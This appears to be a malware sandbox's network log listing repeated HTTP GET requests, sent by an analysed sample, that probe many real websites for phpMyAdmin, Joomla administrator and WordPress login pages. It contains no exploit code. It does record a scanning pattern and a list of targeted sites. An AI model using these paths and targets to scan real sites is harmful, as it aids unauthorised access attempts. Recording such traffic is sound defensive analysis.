Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ismaworld.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eddc.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=36ce27554c1b5fa0a3332a6f3933e64f08535353-1703276091; __cf_bm=Mr7liE5R.aLYKQbeRzXeBQtbVe4Y_ihQqrSFn.H1rMw-1703276091-1-AeA1g101VbceZhpcHFMIiLxSDosHM4U3kUoUGhUr84Y19L6SpxWeNOPXAgFDz8DdogFzkLwsqTh8mVyq+jr0wvI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.covicol.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //phpmyadmin/ HTTP/1.1Host: trivandrum.german.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc3\|ZYXxG\|ZYXxGUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.conquestaccounting.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=0_u.f76yhO0ytQ.PcL9YYZi3Mfcha.NU5TjBdG5v2mY-1703276092-1-AVbRM/E3SNz9wtbySQ545wpVXp9HkixIJLpbROCOdMp5sAEb27sBqRYGyL2a4zW4/UDgeRv5vnSiDroaJ9MhFtY=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //admin HTTP/1.1Host: trivandrum.german.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://yandfcorp.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://customizedperformance.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ispsolucoes.com/administrator/
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipCookie: site_version_phase=108; site_version=HDv3User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.hugedomains.com/domain_profile.cfm?d=yuejichem.com
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipCookie: site_version_phase=108; site_version=HDv3User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.hugedomains.com/domain_profile.cfm?d=vixej.com
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipCookie: site_version_phase=108; site_version=HDv3User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.hugedomains.com/domain_profile.cfm?d=keywordranker.com
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://bldowney.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://intermountainmls.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://loghole.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=2fl36mfrg7n47mi7p87aekl7e6User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: apbct_site_landing_ts=1703276093; apbct_site_referer=UNKNOWN; apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522a93b46864202a543689f994154287e7f%2522%257D; apbct_page_hits=1; apbct_timestamp=1703276093; apbct_urls=%7B%22jaydien.com%2Fadministrator%2F%22%3A%5B1703276093%5D%7D; __cf_bm=0_u.f76yhO0ytQ.PcL9YYZi3Mfcha.NU5TjBdG5v2mY-1703276092-1-AVbRM/E3SNz9wtbySQ545wpVXp9HkixIJLpbROCOdMp5sAEb27sBqRYGyL2a4zW4/UDgeRv5vnSiDroaJ9MhFtY=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://jaydien.com/administrator/
Source: global traffic	HTTP traffic detected: GET /wp-admin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.valentinegrowers.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://saltdelcolom.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=ebabc29efc627a5b6a9e110bfc53f3a0a35a7c92-1703276092; __cf_bm=bH7_BFmSsW2DcDVtTveD3_i_9D7TK7HgfSPQf92uV0U-1703276092-1-ASIQ/9fLSSp4Xni2Hq0D3Lm/qEKWl92BpM2ldUZtH3SMtpBF042WggaCSVKa4e5R99m+VhVlDhD1rXvk1lby0fU=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=zLg0kxbTnzSr2Pc6lQFDuxy7XrRjQlkrNFuKQYEQAL0-1703276093-1-AfpybGM9U8VHIQ6Y0JdzmKmjts1tetyBd2QD/UMXzWTwyLI3BLVT3jcXnR0CRt7cedxvgxdxq6l95mNJ3vQvV2A=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pistik.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=2fl36mfrg7n47mi7p87aekl7e6User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /site/mcammondlife/ HTTP/1.1Host: sites.google.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.wika.co.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://saltdelcolom.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //phpmyadmin/ HTTP/1.1Host: adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php/ HTTP/1.1Host: www.flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=86e4b7d6ea29f95c56d290863f1c8e26dc3a8af6-1703276096; __cf_bm=uEwfLfFM0U2S_jMIcw4hEMEZwjd6P6W7VgrMYlzdcWA-1703276096-1-AayFdb5cfFZ2I1c/fqE/KXib6eMU2roQFgGGaVAZSXccxHdNNamEIjLLwbtF8SZWlzYnLsgTP4u91SsVZ9kMWE8=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //phpMyAdmin/ HTTP/1.1Host: trivandrum.german.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //admin/ HTTP/1.1Host: trivandrum.german.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=KH1uwYUkiaQkVP5cOY_ypjT3yakZKS8IRgK398GC6Ho-1703276097-1-ATsrDcy3gZfky6jboZViu9ii9axUoIM6cnwy7FZx3YJM/xekjJwq869G8AZ+hApp97jOweaC/AQIieRk4jdbekE=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
